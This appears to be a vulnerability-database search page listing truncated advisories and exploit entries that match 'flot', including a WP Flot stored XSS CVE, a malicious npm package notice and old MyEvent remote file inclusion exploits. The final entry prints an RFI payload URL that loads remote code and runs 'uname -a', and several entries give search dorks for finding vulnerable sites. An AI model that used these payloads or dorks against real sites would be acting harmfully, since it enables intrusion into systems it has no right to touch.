13 matches found
EUVD-2025-202975
The WP Flot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linechart' shortcode in all versions up to, and including, 0.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated...
CVE-2025-13906 WP Flot <= 0.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
The WP Flot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linechart' shortcode in all versions up to, and including, 0.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated...
CVE-2025-13906
CVE-2025-13906 (WP Flot) is a stored cross-site scripting vulnerability in the WP Flot WordPress plugin. The issue affects all versions up to and including 0.2.2 and stems from insufficient input sanitization and output escaping in the linechart shortcode attributes. As a result, authenticated at...
WordPress plugin WP Flot 跨站脚本漏洞
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress is a set of blogging platforms developed using the PHP language. The platform has the ability to host personal blog sites on PHP and MySQL based servers.WordPress plugin is an application plugin. A cross-site...
Malicious code in flot-axis (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 75e800a2dadaa8f5d0ac8a5db1564e97a702c66176c2da0c537191d88cf8fc81 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2023-1035 Malicious code in flot-axis (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 75e800a2dadaa8f5d0ac8a5db1564e97a702c66176c2da0c537191d88cf8fc81 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Matlab R2009b Array Overrun
Matlab R2009b Array Overrun code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 08.01.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Matlab R2009b NOTE: Prior versions may also be affected. Original...
Mambo Component User Home Pages 0.5 - Remote File Inclusion
Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends Code : global...
MyEvent-1.2.txt
Website : http://mywebland.com/ Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php" I. Remote Code Execution This is script to very big high it bug being found...
MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================= MyEvent = 1.3 myeventpath Remote File Inclusion Vulnerability ================================================================= Script : MyEvent Version : 1.2 Risk : High...
MyEvent 1.3 - event.php Remote File Inclusion
MyEvent 1.3 - event.php Remote File Inclusion Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php"...
MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability
No description provided by source. Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php"...
MyEvent 1.3 - 'event.php' Remote File Inclusion
Script : MyEvent Version : 1.2 Risk : High Class : Remote Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends Google look for : = "MyEvent 1.2 " or "/calendar/myevent.php" http://www.site.com/path/event.php?myeventpath=http://www.site.com/x.txt?&cmd=uname -a milw0rm.com 2006-04-17...